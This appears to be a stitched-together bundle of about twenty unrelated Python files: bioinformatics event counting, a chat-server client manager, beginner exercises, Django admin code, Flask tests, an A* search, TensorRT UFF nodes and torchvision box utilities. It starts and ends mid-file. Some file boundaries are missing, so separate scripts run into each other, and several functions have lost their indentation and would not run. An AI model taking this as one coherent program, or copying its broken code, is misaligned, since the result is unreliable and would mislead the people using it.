                event_counts[sp2[0]] = int(sp2[1])
            _add_event_counts(aec, model, generax_radius, event_counts)
    return aec
"""
event_counts is a dictionnary event_label->count
for instance event_counts["T"] == 5 for 5 transfers
"""
def update_event_counts(datadir, model, generax_radius, event_counts):
    """Merge one event_counts entry into the on-disk store for datadir."""
    all_counts = get_all_event_counts(datadir)
    _add_event_counts(all_counts, model, generax_radius, event_counts)
    _save_all_event_counts(datadir, all_counts)
def get_D_S(event_counts):
    """Duplications per speciation (speciations include SL events)."""
    speciations = event_counts["S"] + event_counts["SL"]
    return float(event_counts["D"]) / float(speciations)
def get_D_lf(event_counts):
    """Duplications per leaf."""
    return float(event_counts["D"]) / float(event_counts["Leaf"])
def get_T_S(event_counts):
    """Transfers (T + TL) per speciation (S + SL)."""
    transfers = event_counts["T"] + event_counts["TL"]
    speciations = event_counts["S"] + event_counts["SL"]
    return float(transfers) / float(speciations)
def get_T_lf(event_counts):
    """Transfers (T + TL) per leaf."""
    transfers = event_counts["T"] + event_counts["TL"]
    return float(transfers) / float(event_counts["Leaf"])
def get_D_L(event_counts):
    """Duplications per loss (losses counted as TL + SL)."""
    losses = event_counts["TL"] + event_counts["SL"]
    return float(event_counts["D"]) / float(losses)
def print_event_counts_norm(aec):
    """Print, for each (model, radius) entry in aec, the leaf count and a
    series of event-count ratios (duplications/transfers normalized by
    leaves and by speciations).

    NOTE(review): assumes S, LF and S+SL are all non-zero for every entry —
    a zero speciation or leaf count would raise ZeroDivisionError.
    """
    if (aec == {}):
        print("No event counts")
        return
    for model in aec:
        for generax_radius in aec[model]:
            toprint = "counts for model " + model
            toprint += " and radius " + str(generax_radius)
            toprint += "\n"
            event_counts = aec[model][generax_radius]
            # Pull the raw counts out once, as floats for the ratios below.
            D = float(event_counts["D"])
            T = float(event_counts["T"])
            S = float(event_counts["S"])
            SL = float(event_counts["SL"])
            LF = float(event_counts["Leaf"])
            #for event in event_counts:
            #toprint += " " + event + "\t= " + str(event_counts[event]) + "\n"
            toprint += " lf\t= " + str(int(LF)) + "\n"
            toprint += " D/lf\t= " + str(D/LF) + "\n"
            toprint += " D/S\t= " + str(D/S) + "\n"
            toprint += " D/(S+SL)= " + str(D/(S+SL)) + "\n"
            toprint += " S/lf\t= " + str(S/LF) + "\n"
            toprint += " SL/lf\t= " + str(SL/LF) + "\n"
            toprint += " (S+SL)/lf= " + str((S+SL)/LF) + "\n"
            toprint += " T/lf\t= " + str(T/LF) + "\n"
            toprint += " T/S\t= " + str(T/S) + "\n"
            toprint += " T/(S+SL)= " + str(T/(S+SL)) + "\n"
            print(toprint)
def str2(s):
    """Format a number with exactly two decimal places."""
    return f"{s:.2f}"
def print_event_freqs(aec):
    """Print, for each (model, radius) entry in aec, the relative frequencies
    of S, D, L (and, when non-zero, T) events, normalized by their sum.

    NOTE(review): here S counts S+SL while L counts SL only, and TL events
    are not included anywhere — confirm this weighting is intentional.
    """
    if (aec == {}):
        print("No event counts")
        return
    for model in aec:
        for generax_radius in aec[model]:
            toprint = "counts for model " + model
            toprint += " and radius " + str(generax_radius)
            toprint += "\n"
            event_counts = aec[model][generax_radius]
            D = float(event_counts["D"])
            T = float(event_counts["T"])
            S = float(event_counts["SL"]) + float(event_counts["S"])
            L = float(event_counts["SL"])
            # Normalize the four counts to frequencies summing to 1.
            norm = D + T + S + L
            D /= norm
            T /= norm
            S /= norm
            L /= norm
            toprint += " S\t= " + str2(S) + "\n"
            toprint += " D\t= " + str2(D) + "\n"
            toprint += " L\t= " + str2(L) + "\n"
            toprint += " D/S\t= " + str2(D/S) + "\n"
            # Transfer lines are printed only when any transfers were seen.
            if (T != 0.0):
                toprint += " T\t= " + str2(T) + "\n"
                toprint += " T/S\t= " + str2(T/S) + "\n"
            print(toprint)
def print_event_counts_datadir(datadir):
    """Print the event frequencies stored for a single datadir."""
    print_event_freqs(get_all_event_counts(datadir))
    #print_event_counts_norm(get_all_event_counts(datadir))
def sum_event_counts(datadirs):
    """Accumulate the event counts of several datadirs (in memory, into the
    counts loaded from the first one) and print the merged frequencies.

    Datadirs with no event-counts file are skipped; every other datadir is
    expected to share exactly the same (model, radius, event) keys as the
    first one (asserted below).
    """
    sum_aec = get_all_event_counts(datadirs[0])
    for datadir in datadirs[1:]:
        aec = get_all_event_counts(datadir)
        if (aec == {}):
            continue
        # All datadirs must cover the same models/radii to be summable.
        assert(aec.keys() == sum_aec.keys())
        for model in aec:
            assert(aec[model].keys() == sum_aec[model].keys())
            for generax_radius in aec[model]:
                ec = aec[model][generax_radius]
                sum_ec = sum_aec[model][generax_radius]
                for event in sum_ec:
                    sum_ec[event] += ec[event]
    print_event_freqs(sum_aec)
if (__name__ == "__main__"):
    # CLI: one datadir -> print its frequencies; several -> print their sum.
    if (len(sys.argv) < 2):
        print("Syntax python " + os.path.basename(__file__) + " datadirs")
        sys.exit(1)
    if (len(sys.argv) == 2):
        datadir = sys.argv[1]
        print_event_counts_datadir(datadir)
    else:
        datadirs = sys.argv[1:]
        sum_event_counts(datadirs)
|
# coding: utf-8
# Standard Python libraries
from typing import Optional, Tuple
# iprPy imports
from .buildcombos_functions import loaded
__all__ = ['buildcombos']
def buildcombos(style: str,
                database,
                keys: list,
                content_dict: Optional[dict] = None,
                **kwargs) -> Tuple[dict, dict]:
    """
    Wrapper function for the modular buildcombos styles

    Parameters
    ----------
    style : str
        The buildcombos style to use
    database : iprPy.database.Database
        The database to use in building combos
    keys : list
        The calculation multikey set to build combos for
    content_dict : dict, optional
        Contains loaded file content. If not given, an empty
        dict will be created
    kwargs : any
        Additional keyword arguments will be used to limit which records from
        the database are used in building combos values.

    Returns
    -------
    inputs : dict
        Contains the values generated for each key
    content_dict : dict
        Contains loaded file content
    """
    # FIX: the docstring promises an empty dict is created when content_dict
    # is not given, but None used to be forwarded to the style function;
    # honor the documented contract here regardless of the style's handling.
    if content_dict is None:
        content_dict = {}
    return loaded[style](database, keys, content_dict=content_dict, **kwargs)
|
from Client import Client
from Authorizer import Authorizer
from typing import Dict
import socket
import select
from Response import Response, SignOff
from RequestManager import RequestManager
import time
from threading import Timer
from UVMPMException import InvalidRequestSyntax
class ClientManager:
    """Tracks connected sockets/clients, their authorization state and
    per-connection input buffers, and reaps idle connections on a
    background Timer."""

    # Idle clients are disconnected after this many seconds without activity.
    TIMEOUT = 120  # seconds

    def __init__(self):
        self.authorizer = Authorizer("auth_info.json")
        self.request_manager = RequestManager()
        self.sockets: Dict[int, socket.socket] = {}  # fileno : sock
        self.clients: Dict[int, Client] = {}  # fileno : client
        self.authorized_clients: Dict[str, Client] = {}  # username : client
        self.buffered_data: Dict[int, str] = {}  # fileno : data
        self.poller = select.poll()
        # Starts the periodic idle-reaping Timer chain immediately.
        self.remove_idle_clients_forever()

    def client_exists(self, sock: socket.socket):
        """Return True if a Client is already registered for this socket."""
        return sock.fileno() in self.clients

    def create_client(self, sock: socket.socket):
        """Register a new (not yet authorized) client and poll its socket."""
        if self.client_exists(sock):
            return
        client = Client(sock)
        self.clients[sock.fileno()] = client
        self.sockets[sock.fileno()] = sock
        self.poller.register(sock, select.POLLIN)
        print(str(client), "connected.")

    def login_client(self, client: Client, username: str):
        """Mark *client* as authorized under *username*."""
        self.authorized_clients[username] = client
        client.set_authorized(username)
        print(str(client), "authorized.")

    def remove_client(self, client: Client):
        """Drop a client from every registry, unregister it from the poller
        and close its socket."""
        self.clients.pop(client.sock.fileno(), None)
        if client.username:
            self.authorized_clients.pop(client.username, None)
        self.sockets.pop(client.sock.fileno(), None)
        self.buffered_data.pop(client.sock.fileno(), None)
        # fileno() is -1 once a socket has been closed; only live sockets
        # are still registered with the poller.
        if client.sock.fileno() > -1:
            self.poller.unregister(client.sock.fileno())
        client.sock.close()
        print(str(client), "disconnected.")

    def broadcast(self, response: Response):
        """Send *response* to every authorized client."""
        for client in self.authorized_clients.values():
            client.send_response(response)

    def remove_idle_clients_forever(self):
        """Disconnect clients idle for more than TIMEOUT seconds, then
        re-schedule itself to run again in 10 seconds.

        NOTE(review): the SignOff is broadcast even for clients that never
        authorized (client.username may be unset) — confirm receivers
        tolerate that.
        """
        now = time.time()
        for client in list(self.clients.values()):
            if now - client.last_interaction_time > ClientManager.TIMEOUT:
                self.remove_client(client)
                self.broadcast(SignOff(client.username))
                print("removing", str(client), "due to inactivity")
        Timer(10, self.remove_idle_clients_forever).start()

    def add_data(self, fileno, data):
        """Append raw received *data* to the connection's input buffer."""
        if fileno not in self.buffered_data:
            self.buffered_data[fileno] = ""
        self.buffered_data[fileno] += data

    def pop_buffered_requests(self, fileno: int):
        """Parse and return all complete (newline-terminated) requests
        buffered for this connection, leaving any trailing partial line
        in the buffer.

        A request with invalid syntax disconnects the client and discards
        the whole batch.
        """
        raw_messages = self.buffered_data.get(fileno)
        if not raw_messages:
            return []
        client = self.clients.get(fileno)
        split = raw_messages.split("\n")
        # The final element is an incomplete line (possibly ""); keep it.
        raw_messages = split[:-1]
        requests = []
        for raw_message in raw_messages:
            try:
                requests.append(self.request_manager.get_request(client, raw_message))
            except InvalidRequestSyntax:
                self.remove_client(client)
                return []
        self.buffered_data[fileno] = split[-1]
        return requests
|
class Config:
    """Holds a mutable list of instruments."""

    def __init__(self, data=None):
        # FIX: the original used a mutable default argument (data=[]), so
        # every Config() created without arguments shared ONE list and
        # instruments added to one instance appeared in all of them.
        self.instrument_list = [] if data is None else data

    def add_instrument(self, instrument):
        """Append one instrument to the list."""
        # FIX: `+= {instrument}` extended the list with a set; append is the
        # explicit, intended single-element operation.
        self.instrument_list.append(instrument)

    def data(self):
        """Return the underlying instrument list."""
        return self.instrument_list
|
"""
2. Faça um Programa que peça um número e então mostre a mensagem O número informado foi [número].
"""
out = input("Entre com um numero: ")
print("Numero: ", out)
|
# Exercise 5.12 from the book: 24 months of compound interest plus a
# fixed monthly investment on top of an initial deposit.
dep = float(input('Informe o valor do depósito: '))
taxa = int(input('Taxa de juros: '))
invest = float(input('Valor mensal: '))
saldo = dep
for _ in range(24):
    # Accrue one month of interest, then add the monthly investment.
    saldo += ((saldo * taxa) / 100) + invest
print(f'Total: {saldo - dep:.2f}')
|
class Board: # Used for places with more than one area onscreen, like the village
    """A row-major arrayWidth x arrayHeight grid of full-screen images the
    player can pan between; currentImage is the flat index of the shown zone.

    NOTE(review): relies on the Processing (Python mode) builtins
    loadImage/image/floor being in scope.
    """

    def __init__(self, canvasWidth, canvasHeight, imagePrefix, arrayWidth, arrayHeight, firstImage):
        self.canvasWidth = canvasWidth
        self.canvasHeight = canvasHeight
        self.imagePrefix = imagePrefix
        self.arrayWidth = arrayWidth
        self.arrayHeight = arrayHeight
        self.images = []
        # Image files are named "<prefix>-1.png" .. "<prefix>-N.png".
        for i in range(arrayWidth*arrayHeight): # Finding all the images
            self.images.append(loadImage(imagePrefix + "-" + str(i + 1) + ".png"))
        self.currentImage = firstImage
        self.action = ""

    def run(self):
        """Draw the current zone, then apply any pending pan action."""
        self.display()
        # When the player moves offscreen to a different zone. I should probably make it pan, but this is the best I got (TODO)
        if self.action == "l":
            # Can move left unless already in the leftmost column.
            if self.currentImage % self.arrayWidth != 0:
                self.currentImage -= 1
        if self.action == "r":
            # FIX: the old test (currentImage % arrayWidth - 1 == 0) only
            # allowed moving right FROM column 1; moving right is valid from
            # every column except the rightmost one.
            if self.currentImage % self.arrayWidth != self.arrayWidth - 1:
                self.currentImage += 1
        if self.action == "u":
            # Can move up unless already in the top row.
            if floor(self.currentImage/self.arrayWidth) != 0:
                self.currentImage -= self.arrayWidth
        if self.action == "d":
            # Can move down unless already in the bottom row.
            if floor(self.currentImage/self.arrayWidth) != self.arrayHeight - 1:
                self.currentImage += self.arrayWidth
        self.action = ""

    def display(self):
        """Draw the current zone's image stretched to the whole canvas."""
        #background(0, 100, 0)
        image(self.images[self.currentImage], 0, 0, self.canvasWidth, self.canvasHeight)
|
#!/usr/bin/env python
# encoding: utf-8
from __future__ import unicode_literals
from django.contrib import admin
from .models import GroceryList, GroceryItem, \
GroceryAisle, GroceryShared, \
GroceryRecipe
from .serializers import GroceryItemSerializer
class GroceryListInline(admin.TabularInline):
    """Inline editor for a grocery list's items."""
    model = GroceryItem
    # NOTE(review): 'ser' is not a TabularInline option and looks unused by
    # the admin machinery — confirm before removing.
    ser = GroceryItemSerializer
class GroceryListAdmin(admin.ModelAdmin):
    """Admin config for GroceryList: filter/search/sort by author and title."""
    #inlines = [GroceryListInline, ]
    list_display = ['title', 'author']
    list_filter = ['author']
    search_fields = ['author__username', 'title']
    ordering = ['author__username', 'title']
class GroceryItemAdmin(admin.ModelAdmin):
    """Admin config for GroceryItem, showing the owning list's author."""
    list_display = ['list', 'item', 'listAuthor']
    list_filter = ['list', 'list__author']
    ordering = ['list', 'item']
    search_fields = ['list']

    def listAuthor(self, obj):
        # Computed column: the author of the list this item belongs to.
        return obj.list.author
    listAuthor.short_description = 'Author'
class GroceryAisleAdmin(admin.ModelAdmin):
    """Admin config for GroceryAisle: browse/search aisles per author."""
    list_display = ['aisle', 'author']
    ordering = ['aisle', 'author__username']
    list_filter = ['author']
    search_fields = ['author__username', 'aisle']
class GrocerySharedAdmin(admin.ModelAdmin):
    """Admin config for GroceryShared; shared_by is hidden from the form."""
    list_display = ['list', 'shared_by']
    list_filter = ['shared_by', 'shared_to']
    search_fields = ['shared_by__username', 'shared_to__username']
    exclude = ['shared_by']
    ordering = ['list']
class GroceryRecipeAdmin(admin.ModelAdmin):
    """Admin config for GroceryRecipe, showing the owning list's author."""
    list_display = ['list', 'recipe', 'listAuthor']
    list_filter = ['list', 'recipe', 'list__author']

    def listAuthor(self, obj):
        # Computed column: the author of the list this recipe belongs to.
        return obj.list.author
    listAuthor.short_description = 'Author'
# TODO: Admin site is disabled for List since there are no web hooks yet
# admin.site.register(GroceryList, GroceryListAdmin)
# admin.site.register(GroceryShared, GrocerySharedAdmin)
# admin.site.register(GroceryItem, GroceryItemAdmin)
# admin.site.register(GroceryAisle, GroceryAisleAdmin)
# admin.site.register(GroceryRecipe, GroceryRecipeAdmin)
|
#!/usr/bin/env python3
import pathlib
from typing import Dict, List, Optional, Union
from copy import copy
try:
    # ujson is a drop-in, faster json parser; fall back to stdlib json.
    import ujson as json
except ModuleNotFoundError:
    import json  # type: ignore

# Mapping: category name -> list of {"text": ..., "author": ...} joke dicts.
JokeType = Dict[str, List[Dict[str, str]]]
JOKES: JokeType = {"default": []}


class JsonError(Exception):
    """Raised when a joke file is malformed or mis-structured."""
    pass


def load_jokes(
    filename: Union[str, pathlib.Path], jokes: Optional[JokeType] = None
) -> JokeType:
    """Load jokes from a JSON file, or recursively from every file in a
    directory, merged on top of *jokes* (or the empty JOKES template).

    Each file must contain {"jokes": [{"text": ...}, ...]} and may carry
    file-level "category" and "author" defaults; a per-joke "author"
    overrides the file-level one.  Raises JsonError on malformed JSON or
    an invalid structure; a non-existent path yields the base mapping.
    """
    fl = pathlib.Path(filename)
    # FIX: copy() was shallow, so the category lists (including the shared
    # JOKES["default"] list) were aliased and the module-level JOKES was
    # mutated by every load; copy each category list as well.
    source = jokes if jokes else JOKES
    res_jokes: JokeType = {cat: list(items) for cat, items in source.items()}
    if fl.exists():
        if fl.is_dir():
            # Recurse over every file in the directory, accumulating.
            for file in fl.iterdir():
                res_jokes = load_jokes(file, res_jokes)
        else:
            # FIX: close the file handle deterministically (the original
            # json.load(open(fl)) leaked it until garbage collection).
            try:
                with open(fl) as fp:
                    data = json.load(fp)
            except ValueError as e:
                raise JsonError(f"malformed json ({e})")
            # Idiom fix: isinstance instead of `type(...) is not list`.
            if "jokes" not in data or not isinstance(data["jokes"], list):
                raise JsonError("`jokes` must be a list of joke objects")
            category = data.get("category", "default")
            author = data.get("author")
            for joke in data["jokes"]:
                if "text" not in joke:
                    raise JsonError("no `text` in joke object")
                res_jokes.setdefault(category, []).append(
                    {
                        "text": joke["text"],
                        "author": joke.get("author", author),
                    }
                )
    return res_jokes
if __name__ == "__main__":
jokes = load_jokes("jokes")
print(jokes)
|
from collections import Counter
lb = 171309
ub = 643603
def possible_password(pw):
    """Return True if *pw* is a valid password (Advent of Code 2019 day 4):
    it contains at least one pair of adjacent equal digits, and its digits
    never decrease from left to right.

    Generalized: works for any number of digits (the original hard-coded
    six-digit inputs via range(5) and crashed on other lengths).
    """
    as_word = str(pw)
    n = len(as_word) - 1
    # Must contain at least one adjacent repeated digit.
    if all(as_word[i] != as_word[i + 1] for i in range(n)):
        return False
    # Digits must be monotonically non-decreasing.
    if any(int(as_word[i]) > int(as_word[i + 1]) for i in range(n)):
        return False
    return True
# Part 1: count the valid passwords in [lb, ub).
# FIX: the original built a full boolean list and re-indexed range(lb, ub)
# per element (`range(lb, ub)[row]`); filtering directly produces the same
# passwords in one pass.
possible_passwords = [pw for pw in range(lb, ub) if possible_password(pw)]
num_possibles = len(possible_passwords)
print("Part 1: " + str(num_possibles))
# Part 2: additionally require some digit to appear EXACTLY twice.
smaller_range = []
for pw in possible_passwords:
    letter_counts = Counter(str(pw)).values()
    if any(ct == 2 for ct in letter_counts):
        smaller_range.append(pw)
print("Part 2: " + str(len(smaller_range)))
|
"""Demo test suite for testing Flask."""
from server import app
from unittest import TestCase
from model import example_data, connect_to_db, db
from flask import session
class TestFlaskRoutes(TestCase):
    """Test Flask routes that need neither the database nor a session."""

    def setUp(self):
        """Create a test client. """
        self.client = app.test_client()
        app.config['TESTING'] = True

    def test_homepage(self):
        """Make sure home page returns correct HTML."""
        # Use the test client to make requests
        result = self.client.get('/')
        # Compare result.data with assert method
        self.assertIn(b'Type symbols or key words', result.data)

    def test_search_stock_form(self):
        """Test that /stock route processes form data correctly."""
        # 'lk' is expected to match Luckin Coffee in the symbol search.
        result = self.client.get('/stock', query_string={'word': 'lk'})
        self.assertIn(b'Luckin Coffee Inc.', result.data)
class FlaskTestsDatabase(TestCase):
    """Flask tests that use the database.

    NOTE(review): requires a local PostgreSQL database named `testdb`.
    """

    def setUp(self):
        """Stuff to do before every test."""
        # Get the Flask test client
        self.client = app.test_client()
        app.config['TESTING'] = True
        # Connect to test database
        connect_to_db(app, "postgresql:///testdb")
        # Create tables and add sample data
        db.create_all()
        example_data()

    def test_screen_result(self):
        """Test screen result pages and database stocks table."""
        result = self.client.get("/result", query_string={'left': 1, 'right': 20})
        self.assertIn(b"HMI", result.data)

    def test_watchlist_redirect(self):
        """Test watchlist page before user sign-in."""
        # Without a session the watchlist redirects to the sign-in prompt.
        result = self.client.get('/watchlist',
                                 follow_redirects=True)
        self.assertIn(b"Please sign in for Smart Investor Watchlist", result.data)

    def tearDown(self):
        """Do at end of every test."""
        db.session.remove()
        db.drop_all()
        db.engine.dispose()
class FlaskTestsLoggedIn(TestCase):
    """Flask tests with user logged into session.

    NOTE(review): requires a local PostgreSQL database named `testdb`.
    """

    def setUp(self):
        """Set up session."""
        app.config['TESTING'] = True
        app.config['SECRET_KEY'] = 'key'
        self.client = app.test_client()
        # Pre-seed the session so routes see an already-signed-in user.
        with self.client as c:
            with c.session_transaction() as sess:
                sess['email'] = 'ydai7@mail.ccsf.edu'
        connect_to_db(app, "postgresql:///testdb")
        db.create_all()
        example_data()

    def test_show_watchlist(self):
        """Test watchlist page after user login-in."""
        result = self.client.get("/watchlist")
        self.assertIn(b"HMI", result.data)

    def tearDown(self):
        """Do at end of every test."""
        db.session.remove()
        db.drop_all()
        db.engine.dispose()
if __name__ == '__main__':
    # Run all suites with the standard unittest runner.
    import unittest
    unittest.main()
import numpy as np
import matplotlib.pyplot as plt

# Load the samples: column 0 holds q2, column 1 holds p2 (per the labels).
datos = np.loadtxt("datos.txt")
p2_values = datos[:, 1]
q2_values = datos[:, 0]
# Plot q2 against p2 and save the figure.
plt.plot(p2_values, q2_values)
plt.xlabel("p2")
plt.ylabel("q2")
plt.savefig("caos.pdf")
|
# Demo of printf-style (%) string formatting.
# Define a string variable `name` and interpolate it into a greeting.
name = "xiaoming"
print("我的名字叫 %s,请多多关照!" % name)  # %s formats a string
# Define an integer student number and print it zero-padded to 6 digits.
student_no = 100
print("我的学号是 %06d" % student_no)  # %d = decimal integer; %06d zero-pads to width 6
# Floats with explicit precision: 2, 3 and 4 decimal places.
price = 8.5
weight = 7.5
money = price * weight
print("苹果的单价 %.2f 元/斤,购买了 %.3f 斤,需要支付 %.4f 元" % (price, weight, money))  # %f = float
# A literal percent sign is written as %% inside a format string.
scale = 0.25
print("数据比例是 %.2f%%" % (scale * 100))
# LEVEL 11
# http://www.pythonchallenge.com/pc/return/5808.html
# De-interleave cave.jpg: alternating pixels are routed to two half-size
# images, separating the hidden picture from the noise layer.
from PIL import Image, ImageDraw
orig = Image.open('data/cave.jpg')
pix = orig.load()  # pixel-access object for reading source pixels
w, h = orig.size
# Both output images are half the source resolution.
each_size = w // 2, h // 2
new1 = Image.new('RGB', each_size, 'black')
draw1 = ImageDraw.Draw(new1)
new2 = Image.new('RGB', each_size, 'black')
draw2 = ImageDraw.Draw(new2)
odd = True
for x in range(w):
    for y in range(h):
        px = pix[x, y]
        # Two source pixels map onto each half-size coordinate; the `odd`
        # parity decides which output image receives this one.
        new_coords = (x // 2, y // 2)
        if odd:
            draw1.point(new_coords, px)
        else:
            draw2.point(new_coords, px)
        odd = not odd
# NOTE(review): saving as JPEG re-compresses the results; use PNG if exact
# pixel values matter for the next puzzle step.
new1.save('data/cave1.jpg')
new2.save('data/cave2.jpg')
|
class AStar(object):
    """A* search over the game's state graph, with the fringe kept as a
    plain list manually ordered by f = heuristic + path_cost."""

    # MARK: Constructor for a state object.
    def __init__(self, game):
        # A game object supplying the initial/goal states, forbidden states
        # and the shared expansion log.
        self.game = game
        self.root = game.initial
        self.goal = game.goal
        self.forbidden = game.forbidden
        self.expanded = game.expanded
        self.fringe = []

    # MARK: Return true if the node had not been expanded.
    def is_added(self, node):
        """True if an identical state is already waiting in the fringe.

        NOTE(review): not called from any method visible in this class —
        confirm external callers use it before removing.
        """
        for state in self.fringe:
            if node.is_identical_state(state):
                return True
        return False

    # MARK: Add the node to fringe and sorted by heuristic.
    def add_to_fringe(self, node):
        """Insert *node* into the fringe ordered by ascending
        f = heuristic + path_cost; a new node is placed BEFORE existing
        entries with equal f (the comparison uses <=)."""
        if len(self.fringe) == 0:
            node.evaluation_function = node.heuristic + node.path_cost
            self.fringe.append(node)
            return
        for index in range(len(self.fringe)):
            node.evaluation_function = node.heuristic + node.path_cost
            if node.evaluation_function <= self.fringe[index].evaluation_function:
                self.fringe.insert(index, node)
                break
            elif index == len(self.fringe) - 1:
                self.fringe.append(node)
                break
        # NOTE(review): this trailing list of states is built but never
        # used — it looks like leftover debugging code.
        nodes = []
        for entry in self.fringe:
            nodes.append(entry.state)
        return

    # MARK: Pop the first element in the queue.
    def pop_from_fringe(self):
        """Remove and return the lowest-f node from the fringe."""
        return self.fringe.pop(0)

    def search(self):
        """Run the search and return either the solution path or a failure
        message, each followed by the game's expansion log."""
        # Calling recursive method.
        target_node = self.search_recursive(self.root)
        if target_node is None:
            return "No solution found.\n{0}".format(self.game.expanded_in_string())
        else:
            return "{0}\n{1}".format(target_node.path, self.game.expanded_in_string())

    # Return a node if found, or return None if not found.
    def search_recursive(self, node):
        """Expand *node*, enqueue its successors, and recurse on the best
        fringe entries until the goal state is reached or 1000 nodes have
        been expanded.

        NOTE(review): iterating self.fringe while pop_from_fringe mutates it
        is fragile — it behaves as a "keep going while non-empty" loop only
        because each iteration pops from the same list; verify carefully
        before restructuring.
        """
        # Expand the node first.
        generated_states = self.game.expand_state(node)
        # Adding them into priority queue once.
        for state in generated_states:
            self.add_to_fringe(state)
        # Stopping Condition.
        if node.state == self.goal:
            return node
        if len(self.expanded) >= 1000:
            return None
        # Continue Recursive.
        for child in self.fringe:
            target_node = self.search_recursive(self.pop_from_fringe())
            if target_node is not None:
                return target_node
            if len(self.expanded) >= 1000:
                return None
        return None
from django.urls import path
from . import views
# URL routes for this app: /registration/ -> the Registration class-based view.
urlpatterns = [
    path('registration/',
         views.Registration.as_view(),
         name='registration'),
]
|
import traceback
from . import uff_pb2 as uff_pb
from .data import create_data, convert_to_debug_data
class Node(object):
    """A node of a UFF graph under construction: an operation, its inputs,
    and field dictionaries that are converted to uff_pb.Data on export."""

    def __init__(self, graph, op, name, inputs=None, fields=None, extra_fields=None):
        self.graph = graph
        self.inputs = inputs if inputs else []
        self.fields = fields if fields else {}
        self.extra_fields = extra_fields if extra_fields else {}
        self.name = name
        self.op = op
        # Creation backtrace (minus this frame), kept for debugging.
        self._trace = traceback.format_stack()[:-1]

    def _convert_fields(self, fields, debug):
        """Convert a field dict's values to uff_pb.Data.

        Values that are None are dropped; already-converted uff_pb.Data
        values pass through.  When the op has a registered descriptor, the
        descriptor's field type guides the conversion.  In debug mode every
        converted value is additionally wrapped as debug data.
        """
        descriptor = self.graph.meta_graph.descriptor
        ret_fields = {}
        for k, v in fields.items():
            if v is None:
                continue
            if not isinstance(v, uff_pb.Data):
                if self.op in descriptor:
                    field_type = descriptor[self.op].get_field_type(k)
                    ret_fields[k] = create_data(v, field_type)
                else:
                    ret_fields[k] = create_data(v)
            else:
                ret_fields[k] = v
            if debug:
                ret_fields[k] = convert_to_debug_data(ret_fields[k])
        return ret_fields

    def to_uff(self, debug=False):
        """Serialize this node to a uff_pb.Node, flattening Node inputs to
        their names."""
        return uff_pb.Node(id=self.name,
                           inputs=[i.name if isinstance(i, Node) else i for i in self.inputs],
                           operation=self.op,
                           fields=self._convert_fields(self.fields, debug),
                           extra_fields=self._convert_fields(self.extra_fields, debug))
|
from typing import List, Optional, Tuple, Union
import torch
from torch import nn, Tensor
def _cat(tensors: List[Tensor], dim: int = 0) -> Tensor:
"""
Efficient version of torch.cat that avoids a copy if there is only a single element in a list
"""
# TODO add back the assert
# assert isinstance(tensors, (list, tuple))
if len(tensors) == 1:
return tensors[0]
return torch.cat(tensors, dim)
def convert_boxes_to_roi_format(boxes: List[Tensor]) -> Tensor:
    """Concatenate per-image box tensors into ROI format
    [batch_index, x1, y1, x2, y2]."""
    concat_boxes = _cat(list(boxes), dim=0)
    # One batch-index column per box, matching each tensor's row count.
    ids = _cat(
        [torch.full_like(b[:, :1], i) for i, b in enumerate(boxes)],
        dim=0,
    )
    return torch.cat([ids, concat_boxes], dim=1)
def check_roi_boxes_shape(boxes: Union[Tensor, List[Tensor]]):
    """Validate that boxes is List[Tensor[L, 4]] or a single Tensor[K, 5]."""
    if isinstance(boxes, (list, tuple)):
        # Per-image tensors carry 4 coordinates per row.
        for per_image_boxes in boxes:
            torch._assert(
                per_image_boxes.size(1) == 4, "The shape of the tensor in the boxes list is not correct as List[Tensor[L, 4]]"
            )
        return
    if isinstance(boxes, torch.Tensor):
        # A stacked tensor has a batch-index column in front of the 4 coords.
        torch._assert(boxes.size(1) == 5, "The boxes tensor shape is not correct as Tensor[K, 5]")
        return
    torch._assert(False, "boxes is expected to be a Tensor[L, 5] or a List[Tensor[K, 4]]")
    return
def split_normalization_params(
    model: nn.Module, norm_classes: Optional[List[type]] = None
) -> Tuple[List[Tensor], List[Tensor]]:
    """Split a model's trainable parameters into (norm-layer params, others).

    Adapted from https://github.com/facebookresearch/ClassyVision/blob/659d7f78/classy_vision/generic/util.py#L501
    """
    if not norm_classes:
        # Default set of normalization layer base classes.
        norm_classes = [
            nn.modules.batchnorm._BatchNorm,
            nn.LayerNorm,
            nn.GroupNorm,
            nn.modules.instancenorm._InstanceNorm,
            nn.LocalResponseNorm,
        ]
    for t in norm_classes:
        if not issubclass(t, nn.Module):
            raise ValueError(f"Class {t} is not a subclass of nn.Module.")

    classes = tuple(norm_classes)
    norm_params: List[Tensor] = []
    other_params: List[Tensor] = []
    for module in model.modules():
        if next(module.children(), None):
            # Container module: only its direct (non-recursive) parameters
            # count here; children are visited by model.modules() itself.
            other_params.extend(p for p in module.parameters(recurse=False) if p.requires_grad)
        elif isinstance(module, classes):
            norm_params.extend(p for p in module.parameters() if p.requires_grad)
        else:
            other_params.extend(p for p in module.parameters() if p.requires_grad)
    return norm_params, other_params
def _upcast(t: Tensor) -> Tensor:
# Protects from numerical overflows in multiplications by upcasting to the equivalent higher type
if t.is_floating_point():
return t if t.dtype in (torch.float32, torch.float64) else t.float()
else:
return t if t.dtype in (torch.int32, torch.int64) else t.int()
def _upcast_non_float(t: Tensor) -> Tensor:
# Protects from numerical overflows in multiplications by upcasting to the equivalent higher type
if t.dtype not in (torch.float32, torch.float64):
return t.float()
return t
def _loss_inter_union(
boxes1: torch.Tensor,
boxes2: torch.Tensor,
) -> Tuple[torch.Tensor, torch.Tensor]:
x1, y1, x2, y2 = boxes1.unbind(dim=-1)
x1g, y1g, x2g, y2g = boxes2.unbind(dim=-1)
# Intersection keypoints
xkis1 = torch.max(x1, x1g)
ykis1 = torch.max(y1, y1g)
xkis2 = torch.min(x2, x2g)
ykis2 = torch.min(y2, y2g)
intsctk = torch.zeros_like(x1)
mask = (ykis2 > ykis1) & (xkis2 > xkis1)
intsctk[mask] = (xkis2[mask] - xkis1[mask]) * (ykis2[mask] - ykis1[mask])
unionk = (x2 - x1) * (y2 - y1) + (x2g - x1g) * (y2g - y1g) - intsctk
return intsctk, unionk
|
# Generated by Django 2.2.4 on 2019-12-02 04:44
from django.db import migrations, models

class Migration(migrations.Migration):
    """Auto-generated migration: track_entry.with_vehicle now defaults to True."""

    dependencies = [
        ('visitors', '0016_track_entry_security'),
    ]

    operations = [
        migrations.AlterField(
            model_name='track_entry',
            name='with_vehicle',
            field=models.BooleanField(default=True),
        ),
    ]
|
from playsound import playsound

# Each helper triggers one drum sample.  The second playsound argument is 0
# — presumably non-blocking playback so samples can overlap; confirm against
# the playsound documentation for the installed version.
def kick():
    """Play the kick-drum sample."""
    playsound("kick.mp3", 0)

def snare():
